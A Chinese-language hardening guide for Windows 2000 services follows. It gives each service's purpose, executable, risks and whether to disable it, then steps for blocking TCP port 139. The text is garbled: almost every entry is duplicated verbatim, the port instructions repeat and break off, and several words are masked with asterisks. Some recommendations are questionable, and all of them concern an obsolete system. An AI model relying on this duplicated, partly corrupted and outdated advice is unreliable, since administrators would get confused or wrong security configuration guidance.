服务方向:Event Log服务负责记录来自系统和运行中程序的管理事件消息.虽然该服务功能有限,并具有一些小问题,但是该服务可以用于***检测和系统监视.
可执行文件: winnt/system32/services.exe
风险: 无已知风险
建议: 该服务应该被启动,尤其实在独立服务器上.
COM+Eent System
服务方向: 提供自动事件分布功能来订阅COM组件.
可执行文件: winnt/system32/svchost.exe -k nesvcs
风险: 无已知风险
建议: 如果该服务不需要已安装的任何程序所使用,你可以禁用COM+Event System 和 System Event Notification服务.
服务方向: 提供自动事件分布功能来订阅COM组件.
可执行文件: winnt/system32/svchost.exe -k nesvcs
风险: 无已知风险
建议: 如果该服务不需要已安装的任何程序所使用,你可以禁用COM+Event System 和 System Event Notification服务.
Fax
服务方向: 它负责管理传真的发送和接收.
可执行文件: winnt/system32/faxsvc.exe
风险: 无已知风险
建议: 对于服务器而言,不需要也不建议使用该服务,除非该服务器专门被指定为用做一个传真服务器.
服务方向: 它负责管理传真的发送和接收.
可执行文件: winnt/system32/faxsvc.exe
风险: 无已知风险
建议: 对于服务器而言,不需要也不建议使用该服务,除非该服务器专门被指定为用做一个传真服务器.
Single Instance Storage Groveler
服务方向: 该服务和Remote Installation服务一起使用.扫描单一实例存储卷来寻找重复的文件,并将重复文件指向某个数据存储点以节省磁盘空间.
风险: 无已知风险
建议: 除非你需要使用 Remote Installation 服务,否则请停止它.
服务方向: 该服务和Remote Installation服务一起使用.扫描单一实例存储卷来寻找重复的文件,并将重复文件指向某个数据存储点以节省磁盘空间.
风险: 无已知风险
建议: 除非你需要使用 Remote Installation 服务,否则请停止它.
Internet Authentication Service
服务方向: 用于认证拨号和×××用户.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 无已知风险
建议: 显然除了在拨号和×××服务器上,该服务不应该使用.禁止.
服务方向: 用于认证拨号和×××用户.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 无已知风险
建议: 显然除了在拨号和×××服务器上,该服务不应该使用.禁止.
IIS Admin
服务方向: IIS Admin服务允许通过Internet Services Manager MMC程序面板来对IIS服务进行管理.
可执行文件: winnt/system32/inetsrv/inetinfo.exe
风险: 无已知风险
建议: 如果服务器正在运行Inetrnet服务,则该服务是需要的.如果没有运行任何Inetrnet服务,则应当从Control Panel,Add and Remove Programs中卸载Internet Information Server,这样IIS Admin服务也将被卸载.
服务方向: IIS Admin服务允许通过Internet Services Manager MMC程序面板来对IIS服务进行管理.
可执行文件: winnt/system32/inetsrv/inetinfo.exe
风险: 无已知风险
建议: 如果服务器正在运行Inetrnet服务,则该服务是需要的.如果没有运行任何Inetrnet服务,则应当从Control Panel,Add and Remove Programs中卸载Internet Information Server,这样IIS Admin服务也将被卸载.
Intersite Messaging
服务方向: Intersite Messaging服务和Active Directory replication一起使用.
可执行文件: winnt/system32/ismserv.exe
风险: 无已知风险
建议: 除了Active Directory服务器之外,不需要也不建议使用该服务.
服务方向: Intersite Messaging服务和Active Directory replication一起使用.
可执行文件: winnt/system32/ismserv.exe
风险: 无已知风险
建议: 除了Active Directory服务器之外,不需要也不建议使用该服务.
Kerberos Key Distribution Center
服务方向: 这是个域服务,提供了Kerberos认证服务(AS Authentication Service)和票证授予服务(TGT,Ticket-Granting Service)
可执行文件: winnt/system32/lsass.exe
风险: 没有已知风险
建议: Kerberos Key Distribution Center服务和位于某个域控制器是的Active Directory一起工作的,而且不能被停止,除了在域控制器上,该服务不应该在其他计算机上运行.
服务方向: 这是个域服务,提供了Kerberos认证服务(AS Authentication Service)和票证授予服务(TGT,Ticket-Granting Service)
可执行文件: winnt/system32/lsass.exe
风险: 没有已知风险
建议: Kerberos Key Distribution Center服务和位于某个域控制器是的Active Directory一起工作的,而且不能被停止,除了在域控制器上,该服务不应该在其他计算机上运行.
Server
服务方向: 该服务提供RPC支持以及文件,打印和命名管道共享,Server服务是作为文件系统驱动器来实现的,可以处理I/O请求.
可执行文件: winnt/system32/services.exe
风险: 如果没有提供适当地用户保护,会暴露系统文件和打印机资源
建议: 除非你打算在windows网络上共享文件或打印机,否则不需要运行该服务. (附言: 对以2000而言,这个是一个高风险服务,2000的用户多知道默认共享吧,就是该服务的问题,如果不禁止,每次注销或开机,默认共享就会打开,你的所以重要信息都将暴露.例如winnt文件夹.大家都应该知道他对于2000的重要.除非你的密码够安全,否则这个共享将是你机子的死穴!!!!)
服务方向: 该服务提供RPC支持以及文件,打印和命名管道共享,Server服务是作为文件系统驱动器来实现的,可以处理I/O请求.
可执行文件: winnt/system32/services.exe
风险: 如果没有提供适当地用户保护,会暴露系统文件和打印机资源
建议: 除非你打算在windows网络上共享文件或打印机,否则不需要运行该服务. (附言: 对以2000而言,这个是一个高风险服务,2000的用户多知道默认共享吧,就是该服务的问题,如果不禁止,每次注销或开机,默认共享就会打开,你的所以重要信息都将暴露.例如winnt文件夹.大家都应该知道他对于2000的重要.除非你的密码够安全,否则这个共享将是你机子的死穴!!!!)
Workstation
服务方向: 该服务提供网络连接和通信,该服务以一个文件系统驱动器的形式工作,并且可以允许用户访问位于windows网络上的资源.
可执行文件: winnt/system32/services.exe
风险: 一些独立服务器,例如web服务器,不应当参与到某个windows网络中
建议: 该服务应当只在位于某个内部网络,并受到某个防火墙保护的工作站和服务器上运行,在任何可以连接到Internet的服务器上都应该禁用这个服务.
服务方向: 该服务提供网络连接和通信,该服务以一个文件系统驱动器的形式工作,并且可以允许用户访问位于windows网络上的资源.
可执行文件: winnt/system32/services.exe
风险: 一些独立服务器,例如web服务器,不应当参与到某个windows网络中
建议: 该服务应当只在位于某个内部网络,并受到某个防火墙保护的工作站和服务器上运行,在任何可以连接到Internet的服务器上都应该禁用这个服务.
TCP/IP打印服务器
服务方向: 该服务允许远程UNIX用户通过使用TCP/IP协议来访问由某个windows2000服务器所管理的打印机.
可执行文件: winnt/system32/tcpsvcs.exe
风险: 具有一些安全性弱点,并打开一个监听端口
建议: 该服务具有一些安全性弱点,因为打开了一个到internet的端口,因此,除非网络通过防火墙与Internet隔离开.否则不要使用该服务.
服务方向: 该服务允许远程UNIX用户通过使用TCP/IP协议来访问由某个windows2000服务器所管理的打印机.
可执行文件: winnt/system32/tcpsvcs.exe
风险: 具有一些安全性弱点,并打开一个监听端口
建议: 该服务具有一些安全性弱点,因为打开了一个到internet的端口,因此,除非网络通过防火墙与Internet隔离开.否则不要使用该服务.
License Logging
服务方向: 该服务负责管理某个站点的许可协议信息.
可执行文件: winnt/system32/ll***v.exe
风险: 没有已知风险
建议: 除了在域控制器上,其他计算机不应当使用该服务.
服务方向: 该服务负责管理某个站点的许可协议信息.
可执行文件: winnt/system32/ll***v.exe
风险: 没有已知风险
建议: 除了在域控制器上,其他计算机不应当使用该服务.
TCP/IP NETBIOS Helper
服务方向: 该服务允许在TCP/IP网络上进行NETBIOS通信.
可执行文件: winnt/system32/services.exe
风险: 暴露出系统中的netBIOS安全性弱点,例如NTLM认证
建议: 除非你需要和一个旧版本的windows保持兼容,否则应当禁止该服务.
服务方向: 该服务允许在TCP/IP网络上进行NETBIOS通信.
可执行文件: winnt/system32/services.exe
风险: 暴露出系统中的netBIOS安全性弱点,例如NTLM认证
建议: 除非你需要和一个旧版本的windows保持兼容,否则应当禁止该服务.
Messenger
服务方向: Messenger服务负责发送和接收由管理员或Alerter服务所传递的消息.
可执行文件: winnt/system32/services.exe
风险: 没有已知风险
建议: 该服务不需要而且应当被禁用.
服务方向: Messenger服务负责发送和接收由管理员或Alerter服务所传递的消息.
可执行文件: winnt/system32/services.exe
风险: 没有已知风险
建议: 该服务不需要而且应当被禁用.
NetMeeting Remote Desktop Sharing
服务方向: 该服务允许授权用户通过使用NetMeeting来远程访问你的Windows桌面.
可执行文件: winnt/system32/mnmsrvc.exe
风险: 是一个具有潜在不安全性的服务
建议: 该服务应当被禁止.因为它是会导致潜在地安全性弱点的.你可以使用Terminal服务来代替该服务用于远程桌面访问.
服务方向: 该服务允许授权用户通过使用NetMeeting来远程访问你的Windows桌面.
可执行文件: winnt/system32/mnmsrvc.exe
风险: 是一个具有潜在不安全性的服务
建议: 该服务应当被禁止.因为它是会导致潜在地安全性弱点的.你可以使用Terminal服务来代替该服务用于远程桌面访问.
Distributed Transaction Coordinator
服务方向: 微软的Distributed Transaction Coordinator服务(MS DTC)可以借助OLE Transactions协议来提供一个事务(Transaction)协调工具,可以协调分布于两个和多个数据库,消息队列文件系统和其他事务保护(trasaction protected)资源管理器的事务.
可执行文件: winnt/system32/msdtc.exe
风险: 没有已知风险
建议: 无需禁止
服务方向: 微软的Distributed Transaction Coordinator服务(MS DTC)可以借助OLE Transactions协议来提供一个事务(Transaction)协调工具,可以协调分布于两个和多个数据库,消息队列文件系统和其他事务保护(trasaction protected)资源管理器的事务.
可执行文件: winnt/system32/msdtc.exe
风险: 没有已知风险
建议: 无需禁止
FTP Publishing
服务方向: 文件传输协议不是一种安全的协议,如果不进行适当地保护,FTP Publishing服务将大来很多的安全性风险.
可执行文件: winnt/system32/inetsrv/inetinfo.exe
风险: 微软的FTP Server没有已知风险.但一般而言,FTP是已知不安全的服务.
建议: 除非你需要通过FTP来提供文件共享,否则该服务应当被禁止.如果需要,请谨慎地对其进行保护和监视.
服务方向: 文件传输协议不是一种安全的协议,如果不进行适当地保护,FTP Publishing服务将大来很多的安全性风险.
可执行文件: winnt/system32/inetsrv/inetinfo.exe
风险: 微软的FTP Server没有已知风险.但一般而言,FTP是已知不安全的服务.
建议: 除非你需要通过FTP来提供文件共享,否则该服务应当被禁止.如果需要,请谨慎地对其进行保护和监视.
Windows Installer
服务方向: 负责管理软件的安装,改服务对于安装和修复软件应用程序时很有用的.
可执行文件: winnt/system32/msiexec.exe/V
风险:无已知风险
建议: 保留
服务方向: 负责管理软件的安装,改服务对于安装和修复软件应用程序时很有用的.
可执行文件: winnt/system32/msiexec.exe/V
风险:无已知风险
建议: 保留
Network DDE
服务方向: 该服务提供动态数据交换(DDE,Dynamic Data Exhange)数据流传输和安全性.
可执行文件: winnt/system32/netdde.exe
风险: 通过网络接受DDE请求
建议: 对于大多数应用程序而言,Network DDE是不需要的,你应当将它设置为手工启动.
服务方向: 该服务提供动态数据交换(DDE,Dynamic Data Exhange)数据流传输和安全性.
可执行文件: winnt/system32/netdde.exe
风险: 通过网络接受DDE请求
建议: 对于大多数应用程序而言,Network DDE是不需要的,你应当将它设置为手工启动.
Network DDE DSDM
服务方向: 该服务保存一个共享对话(shared conversation)
数据库,这样当某个Network DDE共享被访问时,共享会话将被应用,并且安全性检测系统将确定请求这是否被允许访问.
可执行文件: winnt/system32/netdde.exe
风险: 没有已知风险
建议: 该服务应当设置为手工启动
服务方向: 该服务保存一个共享对话(shared conversation)
数据库,这样当某个Network DDE共享被访问时,共享会话将被应用,并且安全性检测系统将确定请求这是否被允许访问.
可执行文件: winnt/system32/netdde.exe
风险: 没有已知风险
建议: 该服务应当设置为手工启动
Net Logon
服务方向: 支持为域中计算机进行的帐号登录事件的传递认证(pass-through authentication).
可执行文件: winnt/system32/lsass.exe
风险: 可以用于对强力密码***进行传递
建议: 该服务不应当在那些不作为域中一部分的独立服务器上使用.禁止.
服务方向: 支持为域中计算机进行的帐号登录事件的传递认证(pass-through authentication).
可执行文件: winnt/system32/lsass.exe
风险: 可以用于对强力密码***进行传递
建议: 该服务不应当在那些不作为域中一部分的独立服务器上使用.禁止.
Network Connections
服务方向: 该服务负责管理Network and Dial-Up Connections文件夹中的对象,该文件夹中你可以看到局域网和远程连接.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 由于该服务在需要时将自己启动,因此可以设置为手动启动.
服务方向: 该服务负责管理Network and Dial-Up Connections文件夹中的对象,该文件夹中你可以看到局域网和远程连接.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 由于该服务在需要时将自己启动,因此可以设置为手动启动.
Network News Transport Protocol(NNTP)
服务方向: 用于提供一个新闻服务器服务,例如USENET.
可执行文件: winntsystem32/inetsrv/inetinfo.exe
风险: 没有已知风险
建议: NNTP服务器应当安装在一个DMZ网络中,而且应当像其他网络服务,例如FTP,Nail和Web服务那样来对待.不建议在私有网络上配置NNTP服务器,任何位于某个内部网络上的服务器应当卸载或禁用NNTP服务.
服务方向: 用于提供一个新闻服务器服务,例如USENET.
可执行文件: winntsystem32/inetsrv/inetinfo.exe
风险: 没有已知风险
建议: NNTP服务器应当安装在一个DMZ网络中,而且应当像其他网络服务,例如FTP,Nail和Web服务那样来对待.不建议在私有网络上配置NNTP服务器,任何位于某个内部网络上的服务器应当卸载或禁用NNTP服务.
File Replication
服务方向: file replication服务(FRS)可以跨域中的服务器来进行文件,系统策略和登录脚本的复制,该服务还可以用于为分布式文件系统(DFS, Distributed File System)复制数据.
可执行文件: winnt/system32/ntfrs.exe
风险:没有已知风险
建议:它在多个服务之间维护文件目录内容的文件同步,保持原状.
服务方向: file replication服务(FRS)可以跨域中的服务器来进行文件,系统策略和登录脚本的复制,该服务还可以用于为分布式文件系统(DFS, Distributed File System)复制数据.
可执行文件: winnt/system32/ntfrs.exe
风险:没有已知风险
建议:它在多个服务之间维护文件目录内容的文件同步,保持原状.
NTLM Security Support Provider
服务方向: 该服务委远程过程调用(RPC.Remote Procedure Call)程序提供安全性,这些程序使用除命名管道之外的传输方式.该服务仅当client for microsoft安装后才在服务列表中出现.
可执行文件: winnt/system32/lsass.exe
风险: 无已知风险
建议: 既然是安装后才有.当然无需去管,只有你没有安装client for microsoft.
服务方向: 该服务委远程过程调用(RPC.Remote Procedure Call)程序提供安全性,这些程序使用除命名管道之外的传输方式.该服务仅当client for microsoft安装后才在服务列表中出现.
可执行文件: winnt/system32/lsass.exe
风险: 无已知风险
建议: 既然是安装后才有.当然无需去管,只有你没有安装client for microsoft.
Removable Storage
服务方向: 该服务负责管理可移动媒质,磁盘和库.
可执行文件 : winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 你可以在需要时启动该服务.
服务方向: 该服务负责管理可移动媒质,磁盘和库.
可执行文件 : winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 你可以在需要时启动该服务.
Plug-and-Play
服务方向: 该服务负责管理设备安装和配置,并向程序通告设备所出现的变化.
可执行文件: winnt/system32/services.exe
风险: 无已知风险
建议: 在没有这个服务的情况下启动系统是可能的,但时间较长,而且一些服务也无法运行了(如RAS),所以服务可能最好是设置为自动启动.
服务方向: 该服务负责管理设备安装和配置,并向程序通告设备所出现的变化.
可执行文件: winnt/system32/services.exe
风险: 无已知风险
建议: 在没有这个服务的情况下启动系统是可能的,但时间较长,而且一些服务也无法运行了(如RAS),所以服务可能最好是设置为自动启动.
IPSEC Policy Agent
服务方向: 该服务负责管理IP安全并启动ISAKMP/Oakley(IKE)和IP安全性驱动程序.
可执行文件: winnt/system32/lsass.exe
风险: 无已知风险
建议: 这个服务请保留吧.
服务方向: 该服务负责管理IP安全并启动ISAKMP/Oakley(IKE)和IP安全性驱动程序.
可执行文件: winnt/system32/lsass.exe
风险: 无已知风险
建议: 这个服务请保留吧.
Protected Storage
服务方向: 该服务可以为敏感数据(例如私钥)提供受保护的储存来防止它们被未授权的服务,进程或用户访问.
可执行文件: winnt/system32/services.exe
风险: 没有已知风险
建议: 这个就不必问了,它对系统来说是必须的.
服务方向: 该服务可以为敏感数据(例如私钥)提供受保护的储存来防止它们被未授权的服务,进程或用户访问.
可执行文件: winnt/system32/services.exe
风险: 没有已知风险
建议: 这个就不必问了,它对系统来说是必须的.
Remote Access Auto Connection Manager
服务方向: 当用户请求访问某个远程网络地址时,该服务将自动拨号网络连接.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 该服务仅在你使用拨号网络连接时才需要,如果你不是通过拨号上网的,当然也就不需要了.
服务方向: 当用户请求访问某个远程网络地址时,该服务将自动拨号网络连接.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 该服务仅在你使用拨号网络连接时才需要,如果你不是通过拨号上网的,当然也就不需要了.
Remote Access Connection Manager
服务方向: 该服务管理拨号网络连接
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 只有服务器需要支持Routing and Remote Access Service(RRAS)时才需要运行该服务,所以你可以禁止.
服务方向: 该服务管理拨号网络连接
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 只有服务器需要支持Routing and Remote Access Service(RRAS)时才需要运行该服务,所以你可以禁止.
Routing and Remote Access
服务方向: 该服务在局域网和广域网环境中提供路由服务.该服务仅用于远程访问点.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 如果配置不当,该服务将会使非法用户在未授权的情况下访问网络
建议: 该服务是不能关闭的,那只好好好配置咯.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 如果配置不当,该服务将会使非法用户在未授权的情况下访问网络
建议: 该服务是不能关闭的,那只好好好配置咯.
Remote Registry
服务方向: 使得经过授权的管理员能够对位于远程主机上的注册表项目进行操作,对于一些功能,例如远程性能监视,是需要Remote Registry
服务才能工作的.
可执行文件: winnt/system32/regsvc.exe
风险: 如果没有得到适当的配置,会潜在地将注册表暴露
建议: 风险是明显的了,所以啊,不是特别需要,还是禁止吧.
服务方向: 使得经过授权的管理员能够对位于远程主机上的注册表项目进行操作,对于一些功能,例如远程性能监视,是需要Remote Registry
服务才能工作的.
可执行文件: winnt/system32/regsvc.exe
风险: 如果没有得到适当的配置,会潜在地将注册表暴露
建议: 风险是明显的了,所以啊,不是特别需要,还是禁止吧.
Remote Procedure Call(RPC) Locator
服务方向: 该服务可以使那些支持RPC的应用程序注册资源可用性,并使客户能够找到兼容的RPC服务器.
可执行文件: winnt/system32/svchost -k rpcss
风险: 无已知风险
建议: 该服务应当仅在某个域控制器上运行
服务方向: 该服务可以使那些支持RPC的应用程序注册资源可用性,并使客户能够找到兼容的RPC服务器.
可执行文件: winnt/system32/svchost -k rpcss
风险: 无已知风险
建议: 该服务应当仅在某个域控制器上运行
Remote Procedure Call(RPC)
服务方向: 该服务调用位于远程计算机上的可用服务,并用于远程计算机管理.
可执行文件: winnt/system32/svchost -k rpcss
风险: 会暴露系统信息
建议: 虽然会暴露信息,不过没办法拉,谁叫他是任何Windows2000系统上都需要的?
服务方向: 该服务调用位于远程计算机上的可用服务,并用于远程计算机管理.
可执行文件: winnt/system32/svchost -k rpcss
风险: 会暴露系统信息
建议: 虽然会暴露信息,不过没办法拉,谁叫他是任何Windows2000系统上都需要的?
QoS Admission Control
服务方向: 该服务提供带宽管理控制来保证到网络服务的访问.
可执行文件: winnt/system32/rsvp.exe -s
风险: 无已知风险
建议: 如果你使用Windows QoS功能的话,就应当启用它,不要就禁了吧.
服务方向: 该服务提供带宽管理控制来保证到网络服务的访问.
可执行文件: winnt/system32/rsvp.exe -s
风险: 无已知风险
建议: 如果你使用Windows QoS功能的话,就应当启用它,不要就禁了吧.
Secrity Accounts Manager
服务方向: Secrity Accounts Manager(SAM)服务保存了本地用户帐号的安全性信息以用于认证.
可执行文件: winnt/system32/lsass.exe
风险: 虽然有一些方法可以获得SAM数据,但是SAM服务本身并不会带来安全性风险.
建议: 这可是个必须的服务
服务方向: Secrity Accounts Manager(SAM)服务保存了本地用户帐号的安全性信息以用于认证.
可执行文件: winnt/system32/lsass.exe
风险: 虽然有一些方法可以获得SAM数据,但是SAM服务本身并不会带来安全性风险.
建议: 这可是个必须的服务
Task Scheduler
服务方向: 该服务将某个程序调度到在指定的时间运行.对于NT4,只有管理员可以调度任务,而且所以任务都是作为SYSTEM运行的,对于2000,则任何用户都可以调度某一个任务,而且该任务仅在用户各自的用户环境下运行.
可执行文件: winnt/system32/MSTask.exe
风险: ***者可以在此替你运行他种下的***服务端喔
建议: 除非你需要对某个任务作业进行调度,否则该服务应当被禁止.
服务方向: 该服务将某个程序调度到在指定的时间运行.对于NT4,只有管理员可以调度任务,而且所以任务都是作为SYSTEM运行的,对于2000,则任何用户都可以调度某一个任务,而且该任务仅在用户各自的用户环境下运行.
可执行文件: winnt/system32/MSTask.exe
风险: ***者可以在此替你运行他种下的***服务端喔
建议: 除非你需要对某个任务作业进行调度,否则该服务应当被禁止.
RunAs
服务方向: 该服务使得进程可以在另外的用户凭证下启动,这是微软针对特洛伊***程序的一种应对手段.使用RunAs,你可以在作为一个非特权用户而登录的同时以管理员权限运行某个进程.
可执行文件: winnt/system32/services.exe
风险: 没有已知风险
建议: 该服务应当启动
服务方向: 该服务使得进程可以在另外的用户凭证下启动,这是微软针对特洛伊***程序的一种应对手段.使用RunAs,你可以在作为一个非特权用户而登录的同时以管理员权限运行某个进程.
可执行文件: winnt/system32/services.exe
风险: 没有已知风险
建议: 该服务应当启动
System Event Notification
服务方向: 该服务跟踪系统事件.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 该服务记录windows登录,网络和电源事件,建议服务启用.
服务方向: 该服务跟踪系统事件.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 该服务记录windows登录,网络和电源事件,建议服务启用.
Internet Connection Sharing
服务方向: 将某计算机的Internet联机与其他一些计算机进行共享.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 该服务应当禁止,因为它可以使得用户使用一个未经授权的连接,绕过公司网络中的代理和监视服务.
服务方向: 将某计算机的Internet联机与其他一些计算机进行共享.
可执行文件: winnt/system32/svchost.exe -k netsvcs
风险: 没有已知风险
建议: 该服务应当禁止,因为它可以使得用户使用一个未经授权的连接,绕过公司网络中的代理和监视服务.
Simple TCP/IP
服务方向: 这个服务是作为基本的TCP/IP服务而运行,打开了TCP端口7,9,13,17,19.
可执行文件: winnt/system32/tcpsvcs.exe
风险: 在各种TCP端口上运行了一些不安全的服务
建议: 虽然有危险,还是运行吧.
服务方向: 这个服务是作为基本的TCP/IP服务而运行,打开了TCP端口7,9,13,17,19.
可执行文件: winnt/system32/tcpsvcs.exe
风险: 在各种TCP端口上运行了一些不安全的服务
建议: 虽然有危险,还是运行吧.
Simple Mail Transport Protocol(SMTP)
服务方向: 提供外发的Internet邮件服务.
可执行文件: winnt/system32/inetsrv/inetinfo.exe
风险: 可以实现电子邮件的欺骗和中继
建议: 该服务很有用,应当被限制为只能从本地主机或网络上才能访问她.
服务方向: 提供外发的Internet邮件服务.
可执行文件: winnt/system32/inetsrv/inetinfo.exe
风险: 可以实现电子邮件的欺骗和中继
建议: 该服务很有用,应当被限制为只能从本地主机或网络上才能访问她.
SNMP
服务方向: 可以监视网络设备活动的代理,并将这些监视信息报告给网络控制台工作站
可执行文件: winnt/system32/snmp.exe
风险: 在默认情况下,被设置为使用Public作为其社区字符串.他会暴露有关windows2000服务器的敏感信息.
建议: 在内部网上用它才好.
服务方向: 可以监视网络设备活动的代理,并将这些监视信息报告给网络控制台工作站
可执行文件: winnt/system32/snmp.exe
风险: 在默认情况下,被设置为使用Public作为其社区字符串.他会暴露有关windows2000服务器的敏感信息.
建议: 在内部网上用它才好.
SNMP Trap
服务方向: 接受从其他SNMP代理发过来的SNMP信息
可执行文件: winnt/system32/snmptrap.exe
风险: 没有已知风险
建议: 在内部网使用吧,其他就不要了.
服务方向: 接受从其他SNMP代理发过来的SNMP信息
可执行文件: winnt/system32/snmptrap.exe
风险: 没有已知风险
建议: 在内部网使用吧,其他就不要了.
Print Spooler
服务方向: 该服务用于假脱机打印作业,使得应用程序打印文件时不必等待.
可执行文件: winnt/system32/spoolsv.exe
风险: 没有已知风险
建议: 除非你要处理打印队列,否则应当禁止该服务.
服务方向: 该服务用于假脱机打印作业,使得应用程序打印文件时不必等待.
可执行文件: winnt/system32/spoolsv.exe
风险: 没有已知风险
建议: 除非你要处理打印队列,否则应当禁止该服务.
Performance Logs and Alerts
服务方向: 处理性能日志和警报,对系统和网络监视而言都是有用的.
可执行文件: winnt/system32/smlogsvc.exe
风险: 没有已知风险
建议: 当然是启用啊
服务方向: 处理性能日志和警报,对系统和网络监视而言都是有用的.
可执行文件: winnt/system32/smlogsvc.exe
风险: 没有已知风险
建议: 当然是启用啊
Telephony
服务方向: 提供电话和基于IP地语音连接.
可执行文件: winnt/system32/svchost.exe -k tapisrv
风险: 没有已知风险
建议: 除非你打算在局域网上使用这种功能,否则应当禁止该服务.
服务方向: 提供电话和基于IP地语音连接.
可执行文件: winnt/system32/svchost.exe -k tapisrv
风险: 没有已知风险
建议: 除非你打算在局域网上使用这种功能,否则应当禁止该服务.
Terminal
服务方向: 可以提供通过TCP/IP连接的远程桌面访问
可执行文件: winnt/system32/termsrv.exe
风险: 可以导致潜在的非法访问远程桌面以及强力***.
建议: 你应当通过IP地址的限制来严格限制对该服务的访问.并且应该进行密切监视.
服务方向: 可以提供通过TCP/IP连接的远程桌面访问
可执行文件: winnt/system32/termsrv.exe
风险: 可以导致潜在的非法访问远程桌面以及强力***.
建议: 你应当通过IP地址的限制来严格限制对该服务的访问.并且应该进行密切监视.
Terminal Services Licensing
服务方向: 用于在应用程序服务模式下使用Terminal服务时管理客户的许可协议.
可执行文件: winnt/system32/lserver.exe
风险: 没有已知风险
建议: 该服务当服务器在Application Server Mode下运行Terminal服务时是必须得.
服务方向: 用于在应用程序服务模式下使用Terminal服务时管理客户的许可协议.
可执行文件: winnt/system32/lserver.exe
风险: 没有已知风险
建议: 该服务当服务器在Application Server Mode下运行Terminal服务时是必须得.
Trivial FTP Daemon
服务方向: 实现Trivial FTP Internet标准.
可执行文件: winnt/system32/tftpb.exe
风险: 导致潜在的未经授权的文件访问
建议: 应当应用在本地的可信任网络上.
服务方向: 实现Trivial FTP Internet标准.
可执行文件: winnt/system32/tftpb.exe
风险: 导致潜在的未经授权的文件访问
建议: 应当应用在本地的可信任网络上.
Telnet
服务方向: 该服务允许某个远程用户登录到系统,并使用命令行来运行控制台程序.
可执行文件: winnt/system32/tlntsvr.exe
风险:他的密码是以明文形式传输,如果MTLM认证被启用,则NTLM密码散列也会被发现.
建议: 禁止吧
服务方向: 该服务允许某个远程用户登录到系统,并使用命令行来运行控制台程序.
可执行文件: winnt/system32/tlntsvr.exe
风险:他的密码是以明文形式传输,如果MTLM认证被启用,则NTLM密码散列也会被发现.
建议: 禁止吧
Utility Manager
服务方向: 可以启动和配置可达性工具.
可执行文件: winnt/system32/UtilMan.exe
风险: 没有已知风险
建议: 除非你需要使用可达性工具,否则应当禁止他
服务方向: 可以启动和配置可达性工具.
可执行文件: winnt/system32/UtilMan.exe
风险: 没有已知风险
建议: 除非你需要使用可达性工具,否则应当禁止他
Windows Time
服务方向: 从一个网络时间服务器来设置系统时间.
可执行文件: winnt/system32/services.exe
风险: 没有已知风险
建议: 如果你不是2000,就禁了吧
服务方向: 从一个网络时间服务器来设置系统时间.
可执行文件: winnt/system32/services.exe
风险: 没有已知风险
建议: 如果你不是2000,就禁了吧
World Wide Web Publishing
服务方向: 该服务提供Internet的匿名Web站点访问服务.
可执行文件: winnt/system32/inetsrv/inetinfo.exe
风险: 各种文件访问,远程命令执行,拒绝服务和其他风险都有
建议: 他是必须得,只有靠其他工具维护他的安全咯
服务方向: 该服务提供Internet的匿名Web站点访问服务.
可执行文件: winnt/system32/inetsrv/inetinfo.exe
风险: 各种文件访问,远程命令执行,拒绝服务和其他风险都有
建议: 他是必须得,只有靠其他工具维护他的安全咯
Windows Management Instrumentation
服务方向: 提供系统管理信息,它基本上是一个基于WEB的企业管理兼容工具,用于从各种来源收集并关联管理数据.
可执行文件: winnt/system32/WBEM/WinMgmt.exe
风险: 具有暴露敏感信息的潜在危险
建议: WMI是一种有用的工具,同样也可用于收集信息.如果你不是特别不希望使用该服务,还是启用吧
服务方向: 提供系统管理信息,它基本上是一个基于WEB的企业管理兼容工具,用于从各种来源收集并关联管理数据.
可执行文件: winnt/system32/WBEM/WinMgmt.exe
风险: 具有暴露敏感信息的潜在危险
建议: WMI是一种有用的工具,同样也可用于收集信息.如果你不是特别不希望使用该服务,还是启用吧
Windows Internet Name Service
服务方向: 是微软用于NetBIOS网络的名称服务.
可执行文件: winnt/system32/win.exe
风险: 具有暴露敏感系统信息的潜在危险
建议: 纯粹的Windows2000网络并不依赖WINS.应当被禁用.或是只在本地使用好了.
服务方向: 是微软用于NetBIOS网络的名称服务.
可执行文件: winnt/system32/win.exe
风险: 具有暴露敏感系统信息的潜在危险
建议: 纯粹的Windows2000网络并不依赖WINS.应当被禁用.或是只在本地使用好了.
端口部分
139端口
1.开始—程序—管理工具—本地安全策略—鼠标右点“IP安全策略,在本地机器”;
2.点击“管理IP筛选器表和筛选器操作”,在“管理IP筛选器列表”上点“添加”;
3.将弹出“IP筛选器列表”窗口;
4.添入名称和描述,比如“禁止139”,点添加,然后会出现一个IP“筛选器向导”,点下一步;
5.到“指定IP源地址”窗口,在“源地址”中选择“任何IP地址”,点下一步;
6.在“IP通信目标”的“目标地址”选择“我的IP地址”,点下一步;
7.在“IP协议类型”的“选择协议类型”选择“TCP”,点下一步;
8.在“筛选器向导”的“设置IP协议端口”里第一拦“从任意端口”,第二拦“到此端口”并且添上“139”,点下一步;
9.点“完成”,然后在点“关闭”,回到“管理IP筛选器表和筛选器操作”;
10.选择“管理筛选器操作”,点“添加”;
11.这时会出现一个“筛选器操作向导”的,点“下一步”,在“名称“里添上“禁止139端口”连接,点下一步,选择“阻止”,再点下一步;
12.点“完成”和“关闭”。
139端口
1.开始—程序—管理工具—本地安全策略—鼠标右点“IP安全策略,在本地机器”;
2.点击“管理IP筛选器表和筛选器操作”,在“管理IP筛选器列表”上点“添加”;
3.将弹出“IP筛选器列表”窗口;
4.添入名称和描述,比如“禁止139”,点添加,然后会出现一个IP“筛选器向导”,点下一步;
5.到“指定IP源地址”窗口,在“源地址”中选择“任何IP地址”,点下一步;
